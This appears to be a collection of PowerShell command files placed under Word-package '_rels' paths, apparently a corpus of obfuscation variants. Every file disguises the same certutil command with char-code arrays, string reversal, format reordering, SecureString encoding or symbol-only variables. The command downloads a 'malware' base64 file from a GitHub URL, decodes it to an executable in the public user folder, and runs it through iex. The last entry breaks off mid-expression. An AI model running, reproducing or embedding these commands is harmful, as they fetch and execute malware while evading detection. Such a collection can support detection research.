<file path=word/_rels/obfuscated_commands_certutil_string3_encoding7.txt>& ( $ShELLId[1]+$sHeLLiD[13]+'X')( ((44 , 62 , 101 ,66 ,105 , 156 ,40,75 ,40 ,40,133, 143,110 , 141, 122, 133 ,135,135, 40,42 ,40,51,40, 51, 62 ,71 ,135 , 122, 101 , 150 ,103, 133 , 54,47, 141 ,102,164,47, 105, 143, 101, 114,120 ,105,122 ,55 , 40, 40 , 51,47 , 145 ,47, 53 ,47 ,170,145, 56,141 ,141, 102, 47,53, 47, 164, 141 , 102 , 47 , 53, 47 ,164 , 47,53,47, 143 , 151 ,154, 142, 165 ,160, 141, 102 , 164 ,141 ,102 ,164 ,163,162,145 ,163, 47 ,53 ,47 , 165,141,47 , 53 , 47 , 102, 164 , 141, 102 , 164, 72 ,143, 40 ,141 ,141,47 ,53,47,102,164, 141, 102, 47 , 53,47,164 ,143, 151,47, 53 , 47,154,142 ,165 ,160,141 ,47, 53, 47, 102 , 164,141 ,102 , 47,53, 47,164 , 163,162 , 145,163 , 165 , 47,53 , 47 ,141 ,102 ,164,141 , 102 , 164,47, 53,47, 72,143,40, 145 ,144, 157 , 47,53 ,47 , 143, 145 ,47 ,53 , 47 ,144,55,40 ,154,47 , 53, 47,151 ,164,165, 164 , 162,145, 47,53 , 47,143 , 40,73, 141, 141,102,164,47, 53,47 ,141, 102 , 164 ,143,151 , 154 , 47, 53 ,47,142 ,165, 160 , 141 , 47 , 53,47,102 , 47 , 53,47 , 164 ,47,53,47 , 141, 102 , 164,163, 162 , 145 , 47, 53 ,47,163,165 , 47 , 53,47 ,141,102 , 164, 141 ,102,47 , 53, 47 , 164 ,47 , 53, 47,72,143 ,40 ,164,170,164, 56 , 163 ,153 , 141, 145, 162 , 142, 157, 156, 137 ,47 ,53, 47 , 64,66 ,47, 53,47,142 ,137 ,145, 162, 141 , 167 ,154, 141, 47 , 53, 47,155 ,57,162 ,145, 164, 163 ,47 ,53,47, 141 , 155, 57, 164, 163, 47 ,53,47, 145 , 47,53,47 , 164 ,57 , 147 ,156,151 , 150, 164 ,163 ,151 ,150 , 164, 145 , 153, 141 , 155, 47 ,53 ,47 ,141, 156,156 ,165, 147, 164,47, 53, 47 , 163 ,165 ,152, 155, 151 ,57 , 155 ,157, 143,56 ,164,156,145 ,164,156 , 47, 53, 47, 157 , 143 , 162 ,145 , 163 ,165 ,47 , 53,47 ,142,47, 53, 47 ,165 ,150 ,164,151, 147,56, 167 ,141, 162 ,57,57 , 72,47, 53 ,47 , 163,160 ,164 , 164,47 , 53, 47, 150 , 47 , 53 ,47 ,40, 146 , 47 ,53,47 , 55, 40 , 164 , 151,154,160, 163,55 ,40, 47, 53,47 ,145, 150,143,141 ,143 , 47,53, 47 , 154, 162,165 , 55 , 40, 154,47 ,53,47 ,151,164, 165 , 164,162, 145 , 143 , 47, 50, 50 , 50, 40 ,116 , 157,111 ,123,163 ,105 ,122 , 120 , 130 ,105,55,105, 153 , 117 , 166 , 156 ,151,42 , 73, 133,101 ,162,162 , 101 , 171 ,135, 72 ,72,162,105, 126, 105 ,162 ,123,145,50 ,40 , 50, 40,40 , 107 ,145 ,164 ,55 , 126 ,101 ,122 ,111, 101 ,102, 154 ,105 ,40 ,40,50, 42 , 62 ,42, 53 , 42 , 141 , 66, 145,156,42 ,51, 40 ,40 , 55,126,141, 154 , 165 ,145 , 157, 156,154, 40 ,51 ,40 ,51 ,40 ,73 , 111,105, 130,50 , 42,40,44,50,163 ,166, 40, 40 , 47 , 157 , 146 ,123 , 47,40 , 40 , 47, 47 , 51, 42 ,53 ,40 , 133, 123,164, 162 , 111,116,107, 135 ,40, 50 ,50,40 , 40 , 107 , 145 ,164 ,55,126,101 , 122, 111 , 101,102,154 ,105,40 , 40, 50,42,62,42,53,42, 141 , 66 , 145 ,156, 42, 51 ,40 , 40, 55 , 126, 141,154 , 165 ,145,157 , 156,154 ,40 , 51, 40 ,51, 40,53, 42 ,44,50, 123,145 ,164, 55 ,151,164 , 105 , 115 , 40, 47 , 126 , 101 ,162,151 , 101, 102,154,105 , 72 ,157 , 146 , 163,47, 40, 47,40,47 , 51,40 ,42,40, 51 ,40) | % { ( [CoNveRt]::ToiNt16(($_.TOStriNg() ),8 )-AS [char]) }) -JoIn '')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding7_compress_1.txt> . ( $ShElLId[1]+$SHELlId[13]+'x')([STRiNg]::Join('' ,( '44u162w154@151w62l145!116!75:133@143l150@101P162}133}135J40J135J42@40w51:51J62y71@135:122P141u110!103u133P40u106:55P40u40w51l47u145}170l145u47!53w47P56:47!53l47J141y175:60J173@175l60P173y143u151J154J47u53@47w142@165w160!47:53:47!175J60:173}175J60w47l53P47}173!163l162}47y53!47w145y47y53:47}163y165l175u60!173:175w60w173!72u143l40y141}175w60y173y175u47P53P47:60}173w143}151J154P142:165w160@175J60y173w175J60J173:163@162@145w47w53}47u163@165!175@60@173w175l60u173l47}53y47:72w143J40@145w144P157:47}53P47P143}145l144l47P53u47}55w47@53w47:40@154l151J164}165P164}162}47!53}47y145:143l47u53u47P40u73@141u175J47l53w47@60w173P175@60l173w143w151P154y142u165y47P53y47J160J175w60:173J175y60u173y163J162!47u53:47y145!47P53!47P163@165@47!53!47:175l60y173:175:60l47y53P47u173w72J47J53u47P143J40}47!53}47!164l170w47y53y47u164y56@163y153w47J53l47l141J145w47w53P47J162}47!53@47u142y47}53J47l157w156@137y64@66y142l137w47:53J47}145:162J141u167J154l141@155!57l162u47@53}47w145J164!163@141:155l57y164y163u145@47y53u47P164w57P147J156y151y150l164:163y47!53u47@151:150}164@145P153P141u155:141}156P156!165J47l53}47}147J164}163@165J47w53P47@152l155l151u47}53y47l57l155w157:47l53!47y143y56}164y156u145@164w156y157w47y53y47@143y162:145w163u165l142l165!150y164@151u147y56y167P141u162@57!57P72J47!53J47J163:47}53y47P160l164:47!53}47:164:150J40u47J53P47:146J55l40l164w151y47u53y47!154l160w163P55J40@145}150@47!53y47w143}141J143J47:53P47l154y162u47y53:47J165P47J53y47@55!40:154u151}47:53u47l164:165:164:162J47@53:47l145y47y53:47!143:47l50:50w50@51l47P47l116@111@157w152!55l135:65l62y54:64:62y54J64@133y143!105J160l163@115u157!103P72u166y116u105P44l40y50}40w46@42}40u73:133}141u122l122l101P131J135!72!72l162!145u126:105y162!123l145}50J50y126P101u162!151w101l142!154w105u40y40J50l42P162@42w53y42w154y151@62}145}42w53:42@156P42P51}40w40l55w126J101y114w165P105}157y51@40:51}40u73!56l50l40J44!105@156y126y72w143l117y155w123l160J145}103u133}64u54u62y66!54w62@65P135@55!112w157y151P156P47w47}51u40}50y40:50@126J101J162u151y101l142!154P105y40y40@50:42l162l42:53J42w154P151!62@145}42!53@42u156J42J51y40y40@55u126u101w114}165l105P157y51w55!112l157l111!116}40u47P47l51'.sPlIt( '@}!l:JywPu') |FOReACH-OBJEct{ ( [cHaR] ([COnVerT]::ToiNt16( ( [STriNG]$_),8 ) )) }))) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding8.txt>"$(sV  'Ofs' '' )" +[sTrinG]('40{50i55{112!117W111i116W133N162i145R107%105i130N135!72%72%155!141W124{143>110>145>163W50N40{42Z51R47{170%47R53D135W64N63Z133D105R155Z117W150D163N120i44%53>135N64N133!145Z115D117!150W123>120R44D40D50i56!40Z174W51%62!71N135i122D141%150!103>133i40D106W55Z51D47>145!170{145W47D53R47{56>47D53Z47>141%175W47D53N47%60Z173{175>47i53!47!60W173{47%53{47{143i151>154W47W53!47W142R165>160D175i60i173D175{60D173N47>53{47%163N47D53N47%162{145%47W53{47i163i165Z47i53D47i175{60>47Z53>47R173D175!60>173%72{143Z40D141D175R60>173!175!60R173N143i151Z154W142D165%160D175N47%53R47W60R173i175%60D173i163N162D145D163%47R53W47%165R175!47N53D47>60!173D175Z47W53{47W60%173{47D53{47R72N47{53>47{143D40R47%53Z47i145R47>53W47!144%157{47W53i47R143R145N144!55D40>154>151i47W53!47D164>165D164i162i145N143!47W53N47Z40i73{141{175W60D173N175%60D173W47>53i47Z143{47W53Z47i151i154!142R47N53W47i165Z160N175R60D173W175%60!173>163N162{145Z163!165%175%60%173!47Z53i47N175!60Z173!72R143%40R47R53Z47W164%47!53%47W170W164{56R47i53{47>163%47!53D47Z153%47%53N47i141i145!162D47>53D47!142!47!53>47R157D156W137N64N47i53W47!66Z142i137>145i162N141!167W154{141i155>57R162N145{164%163Z141W155R57N164N163i145i164i57Z147R156Z151>150R164%163D47i53D47Z151{47!53W47R150W164!145R153W47D53%47!141Z155W141D156%156{165N47{53{47!147W164%163%165W152N155>151{57%155Z157!47!53D47>143W56R164%156D145N164{47>53N47i156{157N143{162>145Z163i165>47W53{47i142i47!53!47>165{150i47Z53Z47{164!151D47i53>47%147{56W47W53{47N167>141!162i47N53D47!57N57!72Z163N160W164i164%150i40i146{55Z47>53N47{40{164D151D154N160R47{53{47Z163R55Z40Z145N47>53Z47>150D143!141R143%154R162i47D53%47N165i55N40%154!151W164Z47D53Z47>165Z164%47>53R47%162!145W143Z47%50%50Z40>42R54R40>47%56R47i54Z47R162>111Z147W110!164W124%47i53{47Z157%154D145D106!47Z53D47Z164>47{51R40i51%40N174R40N56>50i40N44W120!123%150D117!155W105>133W62D61W135{53{44>120>163R150!117Z115N105N133{63!60!135W53i47i170i47W51' -SPlit '%' -sPLiT 'i' -SpLiT'D' -SpLiT'Z' -spLiT '!' -Split 'R'-split 'W' -sPliT'N' -SPlIt '{' -sPLIT '>'|%{([cHar]( [ConVErT]::tOiNt16( ( $_.ToSTRing() ) ,8 ) )) }) +" $(SeT-VARIaBLE 'oFS'  ' ') "|.((GEt-vArIaBLe '*mdR*').NaMe[3,11,2]-join'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding8_compress_1.txt> -JOIn( '44F63:64B62I164@40;40H75;42}51@51:62F71;135p122}101H150H103B133}135@107p156B151}162B124p163H133@54:47;144I115p150F47:50}105B143,101I114,120p105}162I56H51F47}145F170;145,56,141F144}115H150I47F53}47I144B115}47F53p47p150I143@47H53;47I151@154F142,165,160,144H115:150I144F115p150H47@53F47I163@162I145:163;165F47p53:47,144F115F150p144,115I150,72@143H40}141B47,53:47,144F115:150F144@115p150H143}151,154H47;53}47,142p165:160F47,53B47;144H47@53}47;115}150I144p115F150:163I162F145@163}165B47:53}47}144}115H150@144p115H47H53B47p150F72p143@47B53I47,40}145H144@157:143I145H144,55@40@154}151B47H53I47@164:165H164}162F145I143H40,47F53;47F73,141:144H115I150B47@53}47F144}115;150H143B47H53}47@151F154}142,165:160:144B115,150;144@47F53F47:115I150H163H162,47p53;47:145,163@165:144I115H150H144B115,150I72}143F40,164;170,164I47I53I47:56}163@153B141p145;162}142I157@156:137:64p66}142,137p145H162,47;53,47@141@47p53:47@167;154@141:155,57H47I53H47}162:47,53}47;145I164}47F53}47,163F141,155B57;164;163F145@164,47@53p47H57}147:156I151:150I164p163I151;150I164@145p153H141p155I47:53H47p141,156I156I165@147,164B163F165B152;47:53@47B155I151,47I53,47H57B155:47@53F47}157:143H56F164B156p145H164;156I157I143I162H47B53p47B145,47p53p47@163,47H53:47,165B47F53@47H142:165,150@164;151@147H56p47;53I47,167B141:162,57}57;72:163;160}47p53H47:164I164:150F40p146F47p53,47,55}47F53F47;40:164,151F154}47:53I47@160p163}55B40}145;150B143B141@143H154:162,165@55;47,53}47}40F154;151B164F165F164H47I53,47F162}145p143@47I50}50,51H47I130;47}53B135p63F61I133}144;111}114B154,105,110;123B44B53I135B61;133}104I151}154p154,145:150;123p44;40@50;40B46}42I73;40p40;46:40}50I40H44:166I145}162B142}157@123}145;120H122}105;146I105p162I105}156:103,145I56F124}157p163}164I122}111p156F107:50;51p133F61F54@63;135}53I47H130:47;55H112;117,111p156F47}47@51:50@42,40H44F50;163I105,124;55I111I164:105@115@40p47,126p141p162B151I101@142:154H105H72,117F146F163@47:40;47:47;51p42B40B53;133F123}164;122:151I116@147B135I40F50;40p50,40F40@147p145p164@55;143;150:151;154F104I151}124B145@155@40B166F101,162:111@101p102F154B145;72@63I64F62F124@40H40B51}56;166p141I154F165:145@133B55;40;61I56,56p55}40I50,40I50B40F40,147:145;164B55,143I150F151F154B104;151@124}145H155B40I166@101B162I111p101,102}154,145B72:63,64H62@124}40@40:51F56@166}141F154,165}145B56p114I145:116p147@124@150,40H51@40H135:51I40}53,42,44F50I163F145,164;55:111p164:145;155B40}40:47@166F101,122p151:141}142F154;105H72:117;146H123p47@40F47}40H47I51}42@51'-SplIt':'-SPLIt'p' -sPLIt'}' -spLiT 'F'-spLIt '@' -spliT ','-SPlIT ';' -SpLIt 'B' -spLit'H' -spLit'I'|% { ( [CHAR] ( [CoNVeRt]::TOInT16( ($_.toSTRINg()) ,8 ) ))})|INvoke-exPrESsION

</file>

<file path=word/_rels/obfuscated_commands_certutil_string_1.txt> (('certu'+'til '+'-ur'+'lcache -split -f ht'+'tps'+':'+'//raw.'+'github'+'usercontent.com/imjustgunnamake'+'thisthin'+'g/'+'te'+'s'+'t'+'/master/malware'+'_'+'b'+'6'+'4_nobr'+'eak'+'s'+'.'+'tx'+'t'+' c:O95O95usersO'+'95O9'+'5p'+'ub'+'l'+'icO'+'95O9'+'5'+'a'+'; certu'+'til'+' -'+'decode c:'+'O95O95'+'u'+'sers'+'O95O95publ'+'ic'+'O9'+'5O95a c:'+'O9'+'5O95'+'u'+'sersO9'+'5'+'O95'+'pub'+'lic'+'O'+'95O'+'95a.exe')-repLAce 'O95',[cHAR]92) |.( $sHElliD[1]+$SHellID[13]+'x')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string_2.txt> . ((GeT-VaRIABLE '*mdR*').NaME[3,11,2]-jOIN'') ( ((("{11}{34}{27}{38}{54}{37}{20}{6}{21}{4}{56}{57}{29}{9}{47}{49}{45}{43}{24}{50}{33}{18}{14}{53}{7}{58}{44}{36}{30}{15}{2}{28}{51}{46}{12}{22}{32}{52}{16}{19}{5}{13}{23}{48}{1}{0}{10}{39}{3}{40}{8}{35}{55}{25}{41}{26}{42}{31}{17}"-f'pu','}{0}','0}{0}users{0}{0','}a','raw.githubuserc','0}',' https:','a','c:{0','m/','bli','certu','il ','{0}us','te','t c:{','c:','xe','/mas','{','f','//','-d','e','a','ers{0}{','ublic{0','l','}pub','nt.co','eaks.tx','}a.e','ec','g/test','ti','}{0}u','re_b64_nobr','split -',' -urlcach','c{0}{0',' ','0}p','}{0','m','wa','na','ertut','imjustg','rs{0','un','kethisthin','lic{0}{0}a; c','ode ','r/m','e -','s','ont','e','l'))  -f[chaR]92) ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string_3.txt>.((GET-VariablE '*mdr*').naMe[3,11,2]-jOIn'') ( ( [rEgEX]::MAtCHES( "XeI| )29]raHc[,)68]raHc[+37]raHc[+84]raHc[(EcAlPER-  )'exe'+'.aVI0VI'+'0c'+'i'+'lbupV'+'I0V'+'I'+'0s'+'resuVI0V'+'I0:c'+' aV'+'I0VI0'+'c'+'i'+'lbu'+'pV'+'I0'+'VI'+'0sresuVI0VI'+'0:c edoced- '+'litutrec ;aVI0VI0'+'c'+'ilb'+'upVI0VI0sre'+'s'+'u'+'V'+'I0VI'+'0:c tx'+'t'+'.ska'+'er'+'b'+'on_'+'46b_'+'er'+'aw'+'l'+'am/retsa'+'m/'+'tset/g'+'n'+'ihtsihtekamannu'+'gts'+'uj'+'m'+'i/mo'+'c.tnetnocresubuhtig.wa'+'r/'+'/'+':s'+'ptth '+'f'+'- tilp'+'s'+'-'+' ehcacl'+'r'+'u'+'-'+' '+'li'+'tut'+'rec'((",'.' , 'RIG'+'h'+'TToLEf'+'t' ) -jOIn '' ) ) 

</file>

<file path=commands_split.txt>[sTriNG]::JoIN( '' ,('99&101x114%116a117%116w105&108a32w45x117{114V108w99%97&99{104{101a32a45%115x112{108a105V116&32-45V102a32-104h116{116a112%115h58&47x47-114x97{119&46h103w105D116%104w117w98V117h115h101a114V99V111a110%116D101D110w116-46{99V111V109&47x105{109%106&117-115w116w103D117D110%110a97x109x97w107x101D116x104-105&115%116{104&105-110&103h47w116{101a115V116%47a109w97w115w116-101a114D47-109&97a108-119a97-114{101h95x98{54V52w95V110x111%98%114-101&97w107&115h46w116w120{116x32V99h58w92D92%117h115w101V114a115-92-92w112%117w98h108h105V99%92x92D97{59h32-99w101a114&116x117-116&105w108a32-45a100V101&99a111-100x101D32D99%58{92&92a117w115D101-114&115w92w92-112{117%98h108V105-99x92D92D97V32w99h58h92{92V117&115{101V114{115&92D92D112x117&98%108{105D99%92h92a97V46D101%120a101'.spLIt( 'VD{&xw%ah-' )|FOREacH-objeCt {([iNt] $_-as [cHar]) }) ) | . ( $PshOME[4]+$pSHOme[30]+'X')
&( $sHellId[1]+$shElLID[13]+'x')( -jOiN ('143@145@162N164N165s164s151N154l40{55w165s162O154!143l141{143!150A145{40Z55w163O160w154O151N164A40l55O146O40Z150w164w164A160Z163w72N57s57@162l141s167N56s147@151N164N150O165w142O165w163s145!162s143O157A156A164w145s156Z164@56!143w157A155{57!151!155!152l165O163O164O147{165@156@156A141O155w141w153!145s164s150N151O163N164O150A151Z156s147!57@164@145A163l164N57O155!141Z163A164N145O162@57!155l141w154s167{141A162O145w137O142@66Z64O137N156s157s142A162!145w141l153l163l56w164Z170N164O40{143A72O134w134s165w163w145l162Z163w134l134!160O165@142@154A151l143N134O134Z141!73w40w143@145Z162w164w165{164!151!154{40O55l144s145A143O157Z144l145w40Z143N72w134{134!165Z163{145w162s163A134!134A160s165!142Z154O151{143w134@134O141w40O143{72{134{134N165N163N145!162s163!134l134N160@165!142s154l151s143N134O134A141!56@145!170!145'.spLIT('AZ{@N!lswO' )| FOREAch { ([coNverT]::TOINT16( ([StrING]$_) ,8) -aS [ChaR]) } ) )
( neW-ObjECT  MaNAgemEnt.AUtOmATion.PScredenTiAL ' ', ( '76492d1116743f0423413b16050a5345MgB8AEcAdAA5ADQAbQBmAG8ATABaAEkAMQBuAEkAWABHAGsAQwBNAHYAcQBxAFEAPQA9AHwAMwBlAGQAMQAzADcAMAA5ADAAZgAxADgAOQAyADcANQAxADkAYgA2ADgAYgAzADQANABkADUANwBjAGMAZgA0AGQAZAA0AGEAYQA2AGUAZABhADQAMQBiAGEANwAwADAAMwBkADMAYwBlAGQAYQA4ADYAYQBjADYAZQAwAGEAMABhADMAMgA1ADIAZQBkADIAZAA2AGQAZQA2ADEAZQAyAGMAZABjAGYAOABiADUAMwBkADUANwBiAGMAYQA5ADUAZQA4ADUAYwA3ADUAZABhADEAZQA3AGYAMABmAGUAMwAwADEANAA0ADgAMABmAGIAZQBiADQANwBlAGYAYwAyADkAZgAwADEAYQA3ADcAOAAyADIAZQA3ADIAOAA3AGEAOABiADcAOQA4ADcAMAAzAGQAMwBkADkAYQBlADQAOAAzADkAMQAyAGIAYQA0ADcANABjADcAYQA1ADMAZgBiAGUAZAA0ADYAOQA3ADQAYQA4ADQAMQA4ADYAOQBiADQAYgAwADIAYQAwADAAZgAwAGQAZQBlADEANgA1AGIAMwAyAGEANABhADQAMQA2AGEANgBjAGEAZQA0AGQAMQA2ADcAOAA0ADEAYwBkAGIANABkADMAMwA2AGQAOQBkAGIANAAyAGEANwBiADUAYwBjADMANgBkAGIAYwA3AGQANQA2AGYAMwAwADMAZQAyAGIAMwA2ADMAZQA5ADcAZgBkADcAMwA5AGQAOABjADQAYQA0ADYANAA5AGYAZQBjAGQANgBiAGMANwBjADMAZQA0ADMAZQBlADgAYgA3ADgAMgBiADQANwA2ADMAMwAzADQAZQBkAGUAYQA0AGYAMQAwAGYAMgA2ADYAOAA4AGYAOQAxAGEAYgA2ADIAMAA5ADYANQAzADAAMgA1ADcAYQBhADMAYgA0AGQAZgA5AGYANgBiADQAZgA1AGQAYwBmAGYAOQBjADIAOAA5AGYANwBlAGIAMQA2ADIAYgBiADUAZAA5AGUAYQAxAGUANwA1AGMAYQBlADEAYgA3ADgAMAA2ADAAYQA5AGEAZgA0AGQANQA1AGUAMgBkADgAYwAzAGQAYgA5ADAAZAAxADkAZQAyADUANAAwAGUANABhAGEANgAyADIAMAA1ADEAYwBiAGUAYgA4AGEAMwBjADYAZABlAGYANgA3ADAANAAyADAANwA2ADUAOABjADcAOABhAGMAYwA1ADcANwAwAGUANgA3AGEANAAzAGQAZgAxADEANgAxAGEAYwAyADMAZQAwAGIANAAxADMAMwA0AGUAYwA5AGEANQA0AGIAYgA0ADIANAA0ADcANgAzAGEAZQAwADIAMwAxADcANQBhADgAOQAyAGEAZgA5AGYAMAA5AGEAYwAxADMAZAAwADMAMQAwADgAMQBiADIAOAAwAGQAZgBjAGMAMQBiADEANgA0ADYANAA1ADMAMABkADgANQAwAGEAZABlAGQAZQBkADIAMAA5ADgAYwAxADgANwBkADQAOQBmAGEAYgAyADEAYgA1ADYAZQBkAGYAOQA3ADMAZgA0ADcANgBjAGQAOQBlADIAOQA2AGMAMgBiAGMAYwAzAGYAMAA4AGYAYQBhAGUAOABhAGEAOABjADIAYQBiAGQAOQA1ADYAZQA0ADUAMwBkADUAOQA5ADcAYwA3AGIAZQAwADQANgAzAGEAZQBhADUAMQA2ADkAYwBiADIAMgA1ADUANwAzADUAMwA4AGMAZQA2ADcANAA3ADAANwA0AGQANAAzADAAOAAzADYAOQBmADYAMQAxAGEANQA3AGYAOAAzAGEAMgA2AGEAOABmAGUAZgAwADEAYQAwAGYAMAAwADgAMQBjADMAYQAzADEAYQA0ADcANAA1ADMAZQAxADQAYQA4ADYAMQA4AGQAZgBmADcAMwBmAGEAMgAyADgAZQBjAGIANwAyADEAZABhADMAZABjADMAYwA1ADcAMgA1AGEAMABhADMAMQBkADYANABiAGMAYQAzAGUAYQA3ADgAOQBiADUAOAA4ADMANgA4ADUANwA2AGEAZABiADMAMABhADcAZQBhAGMAOAAwAGEANQBkADMANQA1ADIAMQA5ADAAYwAxADcAYwBmADEAMwA2ADcAZQBkAGMAMQAzAGEAZQA0ADIANQA5ADYAZABiADQANQBiAGEAMgBhADEAOQBkAGUAOABkAGMANAAxAGEANABlAGMAZgAyADEAZABjADQAYwA1ADgAZgBkADYAZgBhADEAMQBkAGEAYwAxADcANQA0ADQANgAzADEAZQAyADkA'| ConVERtTO-SeCureStriNG  -Key  39,7,147,218,118,192,89,195,218,134,104,12,36,147,60,190,1,96,194,203,218,174,167,20,105,40,181,147,140,145,4,47 )).GEtNETwOrKCREdEnTIAl().PassWOrd|& ( $pshOmE[21]+$PshoMe[30]+'x')
${)}  =  +  $(  );${[!``}  =${)};${ .$}  =++  ${)}  ;${+@.}=(${)}  =${)}  +  ${ .$});${'-}=  (${)}=  ${)}+${ .$}  )  ;  ${%}=  (${)}  =  ${)}  +${ .$}  )  ;${.``}=  (${)}=  ${)}+${ .$});  ${#*}  =  (  ${)}=  ${)}  +${ .$});  ${ %=}  =(  ${)}  =${)}  +  ${ .$}  );  ${);*}  =(  ${)}=${)}+  ${ .$}  );${+}  =(  ${)}=  ${)}+  ${ .$}  );  ${@'}  ="["+  "$(@{  })  "[  ${ %=}  ]+  "$(@{  })"[  "${ .$}"+  "${+}"]+"$(  @{})  "[  "${+@.}"  +"${[!``}"]  +"$?  "[${ .$}]+"]"  ;${)}  =  "".("$(@{})  "[  "${ .$}${%}"]+"$(  @{})"[  "${ .$}${#*}"]  +"$(  @{})"[${[!``}  ]  +"$(  @{}  )"[${%}  ]+  "$?"[  ${ .$}  ]+"$(@{}  )"[${'-}  ]  );${)}="$(  @{  }  )  "[  "${ .$}${%}"]+"$(@{})"[  ${%}]  +"${)}"["${+@.}${ %=}"  ];  .  ${)}  (  "${@'}${+}${+}  +${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}+${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${ .$}${ %=}  +  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${);*}  +  ${@'}${'-}${+@.}+${@'}${%}${.``}  +${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${%}  +  ${@'}${ .$}${[!``}${);*}+  ${@'}${+}${+}  +  ${@'}${+}${ %=}+  ${@'}${+}${+}+  ${@'}${ .$}${[!``}${%}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${'-}${+@.}  +${@'}${%}${.``}+  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${ .$}${+@.}  +  ${@'}${ .$}${[!``}${);*}+${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${'-}${+@.}+${@'}${%}${.``}  +  ${@'}${ .$}${[!``}${+@.}+${@'}${'-}${+@.}  +${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${ .$}${+@.}  +  ${@'}${ .$}${ .$}${.``}+  ${@'}${.``}${);*}+${@'}${%}${ %=}  +${@'}${%}${ %=}  +  ${@'}${ .$}${ .$}${%}  +  ${@'}${+}${ %=}+${@'}${ .$}${ .$}${+}  +  ${@'}${%}${#*}+  ${@'}${ .$}${[!``}${'-}+${@'}${ .$}${[!``}${.``}+${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}  +${@'}${ .$}${ .$}${ %=}+${@'}${+}${);*}+${@'}${ .$}${ .$}${ %=}+  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}  +${@'}${+}${+}  +  ${@'}${ .$}${ .$}${ .$}  +${@'}${ .$}${ .$}${[!``}+  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${ .$}${#*}  +${@'}${%}${#*}+${@'}${+}${+}+${@'}${ .$}${ .$}${ .$}+  ${@'}${ .$}${[!``}${+}+  ${@'}${%}${ %=}  +${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${+}  +  ${@'}${ .$}${[!``}${#*}  +${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${.``}  +${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${[!``}${'-}  +${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${ .$}${[!``}+  ${@'}${+}${ %=}+  ${@'}${ .$}${[!``}${+}  +${@'}${+}${ %=}  +  ${@'}${ .$}${[!``}${ %=}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${[!``}${.``}+${@'}${ .$}${ .$}${.``}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${[!``}${.``}  +${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${[!``}${'-}+${@'}${%}${ %=}+${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${.``}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${%}${ %=}+  ${@'}${ .$}${[!``}${+}+  ${@'}${+}${ %=}  +  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}+${@'}${ .$}${ .$}${%}+${@'}${%}${ %=}  +${@'}${ .$}${[!``}${+}+  ${@'}${+}${ %=}  +  ${@'}${ .$}${[!``}${);*}  +${@'}${ .$}${ .$}${+}+${@'}${+}${ %=}  +  ${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${[!``}${ .$}  +  ${@'}${+}${.``}  +  ${@'}${+}${);*}  +${@'}${.``}${%}+${@'}${.``}${+@.}+  ${@'}${+}${.``}+${@'}${ .$}${ .$}${[!``}  +${@'}${ .$}${ .$}${ .$}  +${@'}${+}${);*}  +  ${@'}${ .$}${ .$}${%}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${+}${ %=}+${@'}${ .$}${[!``}${ %=}+${@'}${ .$}${ .$}${.``}+${@'}${%}${#*}+${@'}${ .$}${ .$}${#*}  +${@'}${ .$}${+@.}${[!``}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${'-}${+@.}  +  ${@'}${+}${+}  +${@'}${.``}${);*}+  ${@'}${+}${+@.}+${@'}${+}${+@.}+${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${%}+${@'}${ .$}${ .$}${.``}  +${@'}${+}${+@.}+  ${@'}${+}${+@.}+${@'}${ .$}${ .$}${+@.}+  ${@'}${ .$}${ .$}${ %=}+  ${@'}${+}${);*}+${@'}${ .$}${[!``}${);*}  +  ${@'}${ .$}${[!``}${.``}+  ${@'}${+}${+}+  ${@'}${+}${+@.}+${@'}${+}${+@.}  +${@'}${+}${ %=}+${@'}${.``}${+}  +  ${@'}${'-}${+@.}  +  ${@'}${+}${+}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${%}  +${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${#*}  +${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${);*}+  ${@'}${'-}${+@.}  +  ${@'}${%}${.``}  +${@'}${ .$}${[!``}${[!``}  +${@'}${ .$}${[!``}${ .$}+${@'}${+}${+}  +  ${@'}${ .$}${ .$}${ .$}+  ${@'}${ .$}${[!``}${[!``}  +${@'}${ .$}${[!``}${ .$}  +  ${@'}${'-}${+@.}  +${@'}${+}${+}  +${@'}${.``}${);*}+  